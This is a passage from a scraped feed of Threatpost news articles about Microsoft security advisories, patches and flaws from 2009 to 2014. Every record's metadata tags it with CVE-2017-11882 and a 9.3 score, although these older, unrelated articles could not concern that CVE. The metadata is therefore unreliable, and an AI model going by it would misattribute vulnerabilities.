[warned customers to stay away from the deprecated RC4 algorithm](<http://threatpost.com/microsoft-warns-customers-away-from-sha-1-and-rc4/102902>) last fall. Now it\u2019s giving those who use its .NET software framework an option to disable the cipher in Transport Layer Security (TLS) as well.\n\nIn a security advisory issued on its [Security TechCenter](<https://technet.microsoft.com/en-us/library/security/2960358>) yesterday, echoing its stance last year, Microsoft pointed out that using RC4 in TLS can give an attacker the ability to perform man-in-the-middle attacks and siphon away plaintext from encrypted sessions.\n\n[In November, Microsoft gave](<http://blogs.technet.com/b/srd/archive/2013/11/12/security-advisory-2868725-recommendation-to-disable-rc4.aspx>) those using Windows 7, Windows 8, Windows RT, Server 2008 R2, and Server 2012 the ability to disable the troublesome cipher. Now, six months later, the company is letting anyone running the latest version of .NET to do the same, through modifying the system registry. While .NET users looking to download the updates can find them at Microsoft\u2019s Download Center and Microsoft\u2019s Update Catalog, it\u2019s keeping the update off of Windows Update \u201cin order to give customers the ability to plan and test the new settings for disabling RC4 prior to implementation in their environments.\u201d\n\nRC4\u2019s faults have been well-documented. Now a quarter century old, the cipher is one of the older algorithms in use across the Internet today. With its usage has come an influx of practical attacks, many that can recover plaintext. [One such attack](<http://threatpost.com/attack-exploits-weakness-rc4-cipher-decrypt-user-sessions-031413/77628>), dug up last year by researcher and University of Illinois at Chicago professor Daniel J. Bernstein enabled an attacker to fully compromise a victim\u2019s session that\u2019s protected by TLS/RC4.\n\nThe advisory was one of three Microsoft issued yesterday.\n\n[The second](<https://technet.microsoft.com/en-us/library/security/2871997.aspx>) informed users that the company has tweaked a handful of its operating systems to better protect credentials and domain authentication controls. Updates to Windows 8, Windows RT, Server 2012, Windows 7, and Server 2008 R2 will now enforce stricter authentication policies. Microsoft is doing this by adding an extra layer of security to Local Security Authority (LSA), the interface that logs users onto local systems. The update also adds a new admin mode for its Credential Security Support Provider (CredSSP), a protocol that lets programs use client-side Security Support Provider APIs to assign user credentials from client computers to target servers. The update to CredSSP should prevent credentials from being harvested if the client ever winds up connecting to a compromised server.\n\nMicrosoft points out that while the updates should be beneficial for anyone running the aforementioned systems, they\u2019ll be most useful in enterprise environments where Windows domains are deployed.\n\nIn [the last advisory](<https://technet.microsoft.com/library/security/2962824>) Microsoft gave users a heads up that it went ahead and revoked the digital signatures for four third-party Unified Extensible Firmware Interface (UEFI) modules yesterday. The advisory is a bit vague, but claims the unnamed modules, which could be loaded during a Secure Boot, were not in compliance with the company\u2019s certification program. As the modules were private and third-party, not a whole lot more information was given but Microsoft claims the move was as part of its \u201congoing efforts to protect customers.\u201d\n\nAll advisories of course come on the heels of [yesterday\u2019s Patch Tuesday updates](<http://threatpost.com/microsoft-adobe-issue-critical-fixes-for-may-2014-patch-tuesday/106062>). The update addressed 13 issues, including critical vulnerabilities in IE and its Sharepoint Server software.\n", "cvss3": {}, "published": "2014-05-14T13:21:35", "type": "threatpost", "title": "Microsoft Giving .NET Users The Option to Shed RC4", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-05-14T17:21:35", "id": "THREATPOST:ED7B090DD1289553529F8B6FD87BF467", "href": "https://threatpost.com/microsoft-giving-net-users-the-option-to-shed-rc4/106083/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:13", "description": "In part two of his lecture on exploiting Microsoft Windows, Dino Dai Zovi discusses specific techniques for attacking Windows machines.\n", "cvss3": {}, "published": "2009-11-16T16:24:46", "type": "threatpost", "title": "Windows Exploitation Part 2", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-07-02T19:24:32", "id": "THREATPOST:CDDC2C11CF6377AB44508254B9FB36DA", "href": "https://threatpost.com/windows-exploitation-part-2-111609/73105/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:28", "description": "Microsoft\u2019s initial move into the security products market, the ISA Server, has evolved well beyond its firewall roots. Now known as the Threat Management Gateway, the product is being positioned as a comprehensive Web security gateway. But as Eric Ogren writes in his [review of the Threat Management Gateway](<http://searchsecurity.techtarget.com/news/column/0,294698,sid14_gci1351077,00.html>) [SearchSecurity.com], the beta release offers enterprise IT shops some solid capabilities, but also has some considerable drawbacks.\n\nMicrosoft and nearly any other company on the planet, knows how to build products for mid-tier businesses. In high tech, vendors often prematurely rush features to market in efforts to win awards from reviewers and impress prospects with the depth of their feature checklist. Microsoft takes a very conservative approach with its security products to minimize customer administrative costs and provide fundamental security that works for the duration of the Microsoft relationship. This long term view has benefits and drawbacks for IT that can be illustrated by TMG.\n", "cvss3": {}, "published": "2009-03-18T15:56:00", "type": "threatpost", "title": "Microsoft's Threat Management Gateway is a mixed bag", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:35", "id": "THREATPOST:63EC8A47C53B47DB10146ABB77728483", "href": "https://threatpost.com/microsofts-threat-management-gateway-mixed-bag-031809/72404/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:06", "description": "**[![ASP.NET patch](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07064944/aspnet_patch.jpg)](<https://threatpost.com/microsoft-release-emergency-fix-aspnet-dos-flaw-122911/>)UPDATED** Microsoft on Thursday plans to release an emergency out-of-band update to address a vulnerability in ASP.NET that could allow an attacker to consume all of the resources on a vulnerable server with a single specially designed HTTP request. The vulnerability affects a wide range of Web platforms are vulnerable to this attack, and Microsoft officials said they\u2019re releasing the patch now because they\u2019re expecting exploit code to be released in the near future.\n\nThe vulnerability was discussed at the Chaos Communications Congress conference in Germany earlier this week, although some form of the problem has been known for several years. In addition to ASP.NET, the flaw affects a number of other languages and platforms, including Java, Ruby, Apache Tomcat and the V8 JavaScript engine.\n\nMicrosoft pushed the [patch out for the vulnerability](<https://technet.microsoft.com/en-us/security/bulletin/ms11-100>) on Thursday afternoon, and recommended that customers with vulnerable installations deploy the patch immediately.\n\n\u201cThis vulnerability could allow an anonymous attacker to efficiently consume all CPU resources on a web server, or even on a cluster of web servers. For ASP.NET in particular, a single specially crafted ~100kb HTTP request can consume 100% of one CPU core for between 90 \u2013 110 seconds. An attacker could potentially repeatedly issue such requests, causing performance to degrade significantly enough to cause a denial of service condition for even multi-core servers or clusters of servers,\u201d [Microsoft\u2019s Susha Can and Jonathan Ness said](<https://blogs.technet.com/b/srd/archive/2011/12/27/more-information-about-the-december-2011-asp-net-vulnerability.aspx?Redirected=true>) in a blog post about the problem.\n\n\u201cThe root cause of the vulnerability is a computationally expensive hash table insertion mechanism triggered by an HTTP request containing thousands and thousands of form values. Therefore, any ASP.NET website that accepts requests having HTTP content types application/x-www-form-urlencoded or multipart/form-data are likely to be vulnerable. This includes the default configuration of IIS when ASP.NET is enabled and also the majority of real-world ASP.NET websites.\u201d\n\nIn its [advisory on the ASP.NET issue](<https://technet.microsoft.com/en-us/security/advisory/2659883>), Microsoft suggests a workaround for the problem. The workarounds decreases the maximum size of a request that the server will accept, which lowers the likelihood of the server being susceptible for the attack.\n\n\u201cThis configuration value can be applied globally to all ASP.NET sites on a server by adding the entry to root web.config or applicationhost.config. Alternatively, this configuration can be restricted to a particular site or application by adding it to a web.config file for the particular site or application,\u201d the advisory says.\n\nThe security researchers who published details of the vulnerability, Alexander Klink and Julian Walde, also discuss workarounds and mitigations for the problem in [their paper](<http://www.nruns.com/_downloads/advisory28122011.pdf>). \n", "cvss3": {}, "published": "2011-12-29T15:31:23", "type": "threatpost", "title": "Microsoft to Release Emergency Fix for ASP.NET DoS Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:05", "id": "THREATPOST:66D2F7851992FD5FC9934A5FE7A68E9F", "href": "https://threatpost.com/microsoft-release-emergency-fix-aspnet-dos-flaw-122911/76039/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:01", "description": "![Infiltrate](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065034/infiltrate.jpg)MIAMI BEACH\u2013It\u2019s been a decade now since Microsoft began focusing on product security as a top priority and there have been a lot of successes and some failures along the way. But in that time, one of the things that most definitely has changed as a result of the Trustworthy Computing program is how difficult and expensive it\u2019s become for attackers to compromise Windows machines. That\u2019s not to say, however, that the fight has been won. It\u2019s only beginning, in fact, a senior Microsoft security official said.\n\nThere are a lot of bits and pieces that comprise [Microsoft\u2019s Trustworthy Computing](<https://threatpost.com/ten-years-after-gatess-memo-effects-still-being-felt-011212/>) efforts, from developer training to exploit mitigations to outreach to the security researchers who spend their time attacking the company\u2019s products. But the one thing that all of these initiatives have in common is that they\u2019re focused on increasing the time, effort and investment it takes for an attacker to compromise one of their products. Increasing that degree of difficulty and level of spending by even small increments can provide much larger gains on the defensive side.\n\n\u201cFor stealthy, reliable exploits, you need a lot of R&D and they\u2019re shorter-lived now. It\u2019s getting harder to find bugs and exploits,\u201d Andrew Cushman, senior director of Trustworthy Computing security at Microsoft, said in his keynote talk at the Infiltrate conference here Friday. \u201cThe defender\u2019s ethos is to increase attacker investment. Copy what works and keep plugging away. We\u2019re in this for the long haul.\u201d\n\nAlthough the famous directive from Bill Gates on Trustworthy Computing went out in 2002, one of the first real watershed moments in the company\u2019s efforts to lock down its products was the release of Windows XP SP2 in 2004. That was the first version of the OS to have the Windows firewall turned on by default, and included some other security upgrades as well. Cushman pointed to that as an inflection point for both Microsoft and the attackers who target its systems.\n\n\u201cPre-XP SP2 was the golden age for exploits. Things have only gotten harder since then,\u201d he said. \u201cThose were the days. It was then that the executives said, we\u2019re going to take the steps that are necessary to fix this.\u201d\n\nThose changes were not limited to Windows products, though. The company\u2019s IIS Web server was a frequent and easy target for attackers in the early part of the decade, and that fact did not escape senior management at Microsoft.\n\n\u201cOne of the low points of my career is when Jim Allchin stood up in a meeting and said IIS was a threat to Windows,\u201d Cushman said.\n\nThings have certainly changed since then, but that doesn\u2019t mean that all is sweetness and light for Microsoft or the Internet at large. Sure, it\u2019s become progressively more difficult to find and reliably exploit vulnerabilities in many platforms, but there are still plenty of other systems out there that haven\u2019t caught up. And though life may be more challenging for the dedicated attackers and offensive teams out there, they\u2019re not out of business by any means.\n\n\u201cAttackers are being squeezed from the top and the bottom. But low-skill exploits never go out of style. There\u2019s lots of low-hanging fruit out there, 1990s technology,\u201d Cushman said. \u201cBut for high skill exploits, the barrier to entry is growing. And there\u2019s no shortage of vulnerable technologies that are going to come online in the next few years.\u201d\n\nDespite all of the changes, Cushman said, one thing has remained the same throughout the years.\n\n\u201cAttackers are never going to go away,\u201d he said.\n", "cvss3": {}, "published": "2012-01-13T15:31:13", "type": "threatpost", "title": "Microsoft Aims to Make Life Harder, More Expensive For Attackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:00", "id": "THREATPOST:80978215EBC2D47937D2F3471707A073", "href": "https://threatpost.com/microsoft-aims-make-life-harder-more-expensive-attackers-011312/76094/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:02", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07053828/quicktime_microsoft2.jpg)](<https://threatpost.com/microsoft-warns-dangerous-directshow-flaw-attacks-052809/>)Microsoft today warned that hackers are using rigged QuickTime media files to exploit an unpatched vulnerability in DirectShow, the APIs used by Windows programs for multimedia support.\n\nThe company has activated its security response process to deal with the zero-day attacks has issued a pre-patch advisory with workarounds and a one-click \u201cfix it\u201d feature to enable the mitigations.\n\nFrom the [advisory](<http://www.microsoft.com/technet/security/advisory/971778.mspx>):\n\nMicrosoft is aware of limited, active attacks that use this exploit code. While our investigation is ongoing, our investigation so far has shown that Windows 2000 Service Pack 4, Windows XP, and Windows Server 2003 are vulnerable; all versions of Windows Vista and Windows Server 2008 are not vulnerable.\n\nAn entry on the MSRC blog provides [more details](<http://blogs.technet.com/msrc/archive/2009/05/28/microsoft-security-advisory-971778-vulnerability-in-microsoft-directshow-released.aspx>):\n\nThe vulnerability is in the QuickTime parser in Microsoft DirectShow. An attacker would try and exploit the vulnerability by crafting a specially formed video file and then posting it on a website or sending it as an attachment in e-mail. While this isn\u2019t a browser vulnerability, because the vulnerability is in DirectShow, a browser-based vector is potentially accessible through any browser using media plug-ins that use DirectShow. Also, we\u2019ve verified that it is possible to direct calls to DirectShow specifically, even if Apple\u2019s QuickTime (which is not vulnerable) is installed.\n\nInterestingly, the vulnerable component was removed from Windows Vista and later operating systems but is still available for use in the Microsoft Windows 2000, Windows XP, and Windows Server 2003 operating systems.\n\nVulnerable Windows users should immediately consider disabling QuickTime parsing to thwart attackers. This [KB article provides fix-it button](<http://support.microsoft.com/kb/971778>) that automatically enables the workaround.\n\nIt also provides detailed instructions on using a managed script deployment for Windows shops.\n\nAlso see the [Security Research and Defense blog](<http://blogs.technet.com/srd/archive/2009/05/28/new-vulnerability-in-quicktime-parsing.aspx>) for more information.\n", "cvss3": {}, "published": "2009-05-28T21:16:23", "type": "threatpost", "title": "Microsoft warns of dangerous DirectShow flaw, attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:08", "id": "THREATPOST:88A5449B2DE22E7A3AD1C820BEDE1109", "href": "https://threatpost.com/microsoft-warns-dangerous-directshow-flaw-attacks-052809/72744/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:10", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07055227/ms_office_bug.jpg)](<https://threatpost.com/ms-discovers-over-1800-office-2010-bugs-033110/>)Microsoft uncovered more than 1,800 bugs in \nOffice 2010 by tapping into the unused computing horsepower of idling \nPCs. Office developers \nfound the bugs by running millions of \u201cfuzzing\u201d tests, said Tom \nGallagher, senior security test lead with Microsoft\u2019s Trustworthy \nComputing group. [Read the full article](<http://www.computerworld.com/s/article/9174539/Microsoft_runs_fuzzing_botnet_finds_1_800_Office_bugs>). [Computerworld]\n", "cvss3": {}, "published": "2010-03-31T21:11:20", "type": "threatpost", "title": "MS Discovers Over 1,800 Office 2010 Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:06:49", "id": "THREATPOST:6E19885760DF8E9DD66B4F30158CD173", "href": "https://threatpost.com/ms-discovers-over-1800-office-2010-bugs-033110/73767/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:24", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07055037/ie_holes_2.jpg)](<https://threatpost.com/microsoft-warns-new-ie-code-execution-flaw-030110/>)Microsoft\u2019s security response team is investigating reports of a potentially dangerous code execution vulnerability in its flagship Internet Explorer browser.\n\nThe company warned that an attacker could host a maliciously crafted web page and run arbitrary code if they could convince a user to visit the web page and then get them to press the F1 key in response to a pop up dialog box.\n\nMicrosoft\u2019s Jerry Bryant said the company is not aware of any attacks related to this vulnerability.\n\n\u201cWe have determined that users running Windows 7, Windows Server 2008 R2, Windows Server 2008, and Windows Vista, are not affected by this issue,\u201d Bryant said.\n\nFrom [the MSRC blog](<http://blogs.technet.com/msrc/archive/2010/02/28/investigating-a-new-win32hlp-and-internet-explorer-issue.aspx>): \n\nThe issue in question involves the use of VBScript and Windows Help files in Internet Explorer. Windows Help files are included in a long list of what we refer to as \u201cunsafe file types\u201d. These are file types that are designed to invoke automatic actions during normal use of the files. While they can be very valuable productivity tools, they can also be used by attackers to try and compromise a system. \n\nAlthough this issue has been publicly documented, Microsoft has not yet provided pre-patch mitigation guidance or workarounds for affected customers.\n", "cvss3": {}, "published": "2010-03-01T14:26:26", "type": "threatpost", "title": "Microsoft Warns of New IE Code Execution Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:22:38", "id": "THREATPOST:370DCA5103923FA8965F6D8890D4198F", "href": "https://threatpost.com/microsoft-warns-new-ie-code-execution-flaw-030110/73602/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:46", "description": "[ \n![Get Microsoft Silverlight](http://go.microsoft.com/fwlink/?LinkId=108181) \n](<http://go.microsoft.com/fwlink/?LinkID=124807>)\n\nJonathan Ness of Microsoft\u2019s Security Research and Defense team explains the inner workings of the Data Execution Prevention technology that can help mitigate the [targeted attacks exploiting the vulnerability in Internet Explorer](<https://threatpost.com/how-dep-can-mitigate-ie-zero-day-attacks-011910/>) right now.\n", "cvss3": {}, "published": "2010-01-19T14:32:51", "type": "threatpost", "title": "How DEP Can Mitigate IE Zero-Day Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:06", "id": "THREATPOST:1B56CE326878B69FFA20FFC20DB62365", "href": "https://threatpost.com/how-dep-can-mitigate-ie-zero-day-attacks-011910/73391/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:03", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054549/windows_bitlocker.jpg)](<https://threatpost.com/ms-says-bitlocker-threat-pretty-low-120809/>)Microsoft dismissed recently-disclosed threats to its BitLocker \ndisk-encryption technology as \u201crelatively low risk,\u201d noting that \nattackers must not only have physical access to a targeted PC, but must \nmanipulate the machine two separate times. [Read the full article](<http://www.computerworld.com/s/article/9141959/Microsoft_downplays_Windows_BitLocker_attack_threat>). [Computerworld] \n", "cvss3": {}, "published": "2009-12-08T20:24:42", "type": "threatpost", "title": "MS Says Bitlocker Threat Pretty Low", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:57:07", "id": "THREATPOST:CB62075A4B035B08FDA602FF702FBB71", "href": "https://threatpost.com/ms-says-bitlocker-threat-pretty-low-120809/73227/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:09", "description": "Microsoft has acknowledged a new unpatched vulnerability in Internet Explorer 6 and 7, and said that the company is investigating methods for fixing the flaw.\n\nThe company said that although there is public exploit code available for the vulnerability, it has not seen any evidence of ongoing attacks against the IE flaw yet. Experts said that the exploit code for the vulnerability, which was published on Friday on Bugtraq, was unreliable. However, researchers at IBM ISS\u2019s X-Force said on Monday that they had developed a reliable exploit of their own for the flaw.\n\nIn its advisory on the IE flaw, Microsoft said that the weakness affects IE6 and IE7 running on Windows XP, Windows Server 2003, Windows Vista and Windows Server 2008. The vulnerability does not affect Windows 7, the company\u2019s newest release, or IE8, the latest version of the browser. Microsoft also said that running IE7 in Protected Mode, which limits some of its functionality, on Windows Vista, mitigates some of the effects of the vulnerability.\n\n\u201cAt this time, we are aware of no attacks attempting to use this vulnerability against Internet Explorer 6 Service Pack 1 and Internet Explorer 7. We will continue to monitor the threat environment and update this advisory if this situation changes. On completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through our monthly security update release process, or an out-of-cycle security update, depending on customer needs,\u201d Microsoft said in its advisory.\n\nThe next monthly patch release from Microsoft is due Dec. 8. Until a patch is available, Microsoft suggests several actions that could help mitigate the vulnerability, including setting IE to prompt you before it runs ActiveX controls or active scripting; and enabling DEP (Data Execution Protection) in IE7. To enable DEP, go to the Tools menu, click on Internet Options and then on the Advanced tab. Select the check box for \u201cEnable memory protection to help mitigate online attacks.\u201d\n\nMicrosoft also has published a FixIt tool that will autoatically enable DEP.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054455/ie_bug.jpg)\n\nMicrosoft has acknowledged a new unpatched vulnerability in Internet Explorer 6 and 7, and said that the company is investigating methods for fixing the flaw.\n\nThe company said that although there is public exploit code available for the vulnerability, it has not seen any evidence of ongoing attacks against the IE flaw yet. Experts said that the exploit code for the vulnerability, which was published on Friday on Bugtraq, was unreliable. However, researchers at IBM ISS\u2019s X-Force said on Monday that they had developed a reliable exploit of their own for the flaw.\n\nIn its advisory on the IE flaw, Microsoft said that the weakness affects IE6 and IE7 running on Windows XP, Windows Server 2003, Windows Vista and Windows Server 2008. The vulnerability does not affect Windows 7, the company\u2019s newest release, or IE8, the latest version of the browser. Microsoft also said that running IE7 in Protected Mode, which limits some of its functionality, on Windows Vista, mitigates some of the effects of the vulnerability.\n\n\u201cAt this time, we are aware of no attacks attempting to use this vulnerability against Internet Explorer 6 Service Pack 1 and Internet Explorer 7. We will continue to monitor the threat environment and update this advisory if this situation changes. On completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through our monthly security update release process, or an out-of-cycle security update, depending on customer needs,\u201d Microsoft said in its advisory.\n\nThe next monthly patch release from Microsoft is due Dec. 8. Until a patch is available, Microsoft suggests several actions that could help mitigate the vulnerability, including setting IE to prompt you before it runs ActiveX controls or active scripting; and enabling DEP (Data Execution Protection) in IE7. To enable DEP, go to the Tools menu, click on Internet Options and then on the Advanced tab. Select the check box for \u201cEnable memory protection to help mitigate online attacks.\u201d\n\nMicrosoft also has published a FixIt tool that will automatically enable DEP.\n", "cvss3": {}, "published": "2009-11-24T14:39:50", "type": "threatpost", "title": "Microsoft Acknowledges IE7 Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:04:18", "id": "THREATPOST:0FEEF48E09B4F6AB583220AF2A1CCE70", "href": "https://threatpost.com/microsoft-reconoce-falla-en-ie-7-112409/73159/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:15", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054403/owasp_sdl.jpg)](<https://threatpost.com/microsoft-pushes-better-software-security-practices-111209/>)WASHINGTON\u2013Microsoft has spent several years and untold millions of dollars working on methods to write more secure and reliable software, and now the company is encouraging other organizations to make the same investment in software security.\n\nOne of the outputs of the company\u2019s software security efforts is its much-heralded Security Development Lifecycle (SDLC), a framework for developing methods for writing secure code. However, as Microsoft has acknowledged and other experts have pointed out, the SDLC was developed specifically for Microsoft\u2019s own internal processes and is not a one-size-fits-all methodology. But companies that are interested in using the lessons that Microsoft has learned throughout the process can use the SDLC as a starting point for their own efforts, Jim Molini, a senior program manager at Microsoft said in a talk at the OWASP AppSec DC conference here Thursday.\n\n\u201cIf you build software, you have to focus on how you build it, because it\u2019s becoming a higher priority attack vector right now,\u201d he said. \u201cThey\u2019re finding new ways to attack us and we have to find ways to buttress our software against these attacks.\u201d\n\nMolini said that a software security program has to be a comprehensive effort that includes everyone involved in the development process and must start with a fundamental change in the way that software is written. \n\n\u201cYou have to eliminate the separation of security in the development organization,\u201d he said. \u201cIt\u2019s really going to take people working together to fix this.\u201d\n\nMolini also emphasized that just having a whole bunch of other developers or testers look at the code is not enough.\n\n\u201cMany eyeballs don\u2019t solve the security problem. It\u2019s more than just being able to write code,\u201d Molini said. \u201cIt\u2019s fixing the process aspects and the software development processes in order to reduce the number of vulnerabilities you introduce. You can\u2019t just say zero-defect code is secure. You have to prioritize security as a development goal.\u201d\n\nSoftware security experts often say that when they show developers ways that their applications can be broken or abused, the developers protest that no user would ever do the things that broke the application. Users may not, but attackers most certainly will. To help eliminate this mentality, Molini said developers need to think like attackers and not users.\n\n\u201cYou need to develop abuse cases, not just use cases, so that the test team can develop tests for them,\u201d he said. \u201cThat will make your software much more secure in the long run.\u201d\n", "cvss3": {}, "published": "2009-11-12T19:08:15", "type": "threatpost", "title": "Microsoft Pushes for Better Software Security Practices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:11:49", "id": "THREATPOST:9A9D21304DF605E55290BEAB2BDF62C5", "href": "https://threatpost.com/microsoft-pushes-better-software-security-practices-111209/73089/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:22", "description": "After releasing its largest-ever group of security[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054141/windows_icon.jpg)](<https://threatpost.com/microsoft-cleans-bugs-after-biggest-patch-release-103009/>) patches two weeks ago, Microsoft has done a little cleaning up.\n\nOver the past few days, the company has re-released two security updates and issued a workaround for a Windows CryptoAPI patch that caused Microsoft\u2019s own instant-messaging server to crash. [Read the full story](<http://www.computerworld.com/s/article/9140139/Microsoft_cleans_up_bugs_after_biggest_patch_release?source=rss_security>) [IDG News Service/Robert McMillan]\n", "cvss3": {}, "published": "2009-10-30T13:53:35", "type": "threatpost", "title": "Microsoft Cleans Up Bugs After Biggest Patch Release", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:19:07", "id": "THREATPOST:A653527FBB893B6568AF6B264422BD7A", "href": "https://threatpost.com/microsoft-cleans-bugs-after-biggest-patch-release-103009/72929/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:35", "description": "Less than a week after [a malicious advertising attack against the New York Times](<https://threatpost.com/microsoft-takes-aim-malvertising-threat-092309/>) ad servers, Microsoft filed five civil lawsuits against companies allegedly using online advertising to serve malware.\n\nThe lawsuits allege that individuals using the business names \u201cSoft Solutions,\u201d \u201cDirect Ad,\u201d \u201cqiweroqw.com,\u201d \u201cITmeter INC.\u201d and \u201cote2008.info\u201d used malvertisements to distribute malicious software or present deceptive websites that peddled scareware to unsuspecting Internet users.\n\n\u201cAlthough we don\u2019t yet know the names of the specific individuals behind these acts, we are filing these cases to help uncover the people responsible and prevent them from continuing their exploits, [said Tim Cranton](<https://threatpost.com/microsoft-takes-aim-malvertising-threat-092309/>), associate general counsel at Microsoft.\n\nOur filings in King County Superior Court in Seattle outline how we believe the defendants operated, but in general, malvertising works by camouflaging malicious code as harmless online advertisements. These ads then lead to harmful or deceptive content. For example, ads may redirect users to a website that advertises rogue security software, also known as scareware, that falsely claims to detect or prevent threats on the computer. Malvertising may also directly infect a victim\u2019s computer with malicious software like Trojans \u2013 programs that can damage data, steal personal information or even bring the users\u2019 computer under the control of a remote operator.\n\nHere are the copies of Microsoft\u2019s court filings:\n\n * Microsoft Corp. and Microsoft Online Inc. v. John Does 1-20, d/b/a DirectAd Solutions: King Co. Superior Court Cause [No. 09-2-34024-2 SEA](<http://microsoftontheissues.com/cs/files/folders/32725/download.aspx>)\n * Microsoft Corp. v. John Does 1-20, d/b/a Soft Solutions, Inc. King Co. Superior Court Cause [No. 09-2-34021-8 SEA](<http://microsoftontheissues.com/cs/files/folders/32719/download.aspx>)\n * Microsoft Corp. v. John Does 1-20, d/b/a qiweroqw.com: King Co. Superior Court Cause [No. 09-2-34020-0 SEA](<http://microsoftontheissues.com/cs/files/folders/32722/download.aspx>)\n * Microsoft Corp. v. John Does 1-20, d/b/a ote2008.info: King Co. Superior Court Cause [No. 09-2-34022-6 SEA](<http://microsoftontheissues.com/cs/files/folders/32720/download.aspx>)\n * Microsoft Corp. v. John Does 1-20, d/b/a ITmeter Inc. : King Co. Superior Court Cause [No. 09-2-34023-4 SEA](<http://microsoftontheissues.com/cs/files/folders/32724/download.aspx>)\n", "cvss3": {}, "published": "2009-09-23T22:40:03", "type": "threatpost", "title": "Microsoft Takes Aim at Malvertising Threat", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:50", "id": "THREATPOST:2F3319136B672CD9E6AB9A17CE42DF1B", "href": "https://threatpost.com/microsoft-takes-aim-malvertising-threat-092309/72218/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:39", "description": "Microsoft\u2019s September batch of security updates will include fixes for a multiple \u201ccritical\u201d vulnerabilities affecting the Windows operating system.[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07053133/windows_patch2.jpg)](<https://threatpost.com/five-critical-bulletins-coming-ms-patch-tuesday-090809/>)\n\nIn all, the software maker [will release five bulletins](<http://www.microsoft.com/technet/security/bulletin/ms09-sep.mspx>) with patches for a range of flaws that could expose users to remote code execution attacks.\n\nThe flaws affected all supported versions of Windows, including Windows Vista and Windows Server 2008.\n\nMicrosoft describes a \u201ccritical\u201d vulnerability as one whose exploitation could allow the propagation of an Internet worm without user action so it\u2019s important that Windows users treat next Tuesday\u2019s updates with the highest priority.\n\nIt is not yet clear if this month\u2019s patches will cover the FTP in IIS vulnerability that was disclosed 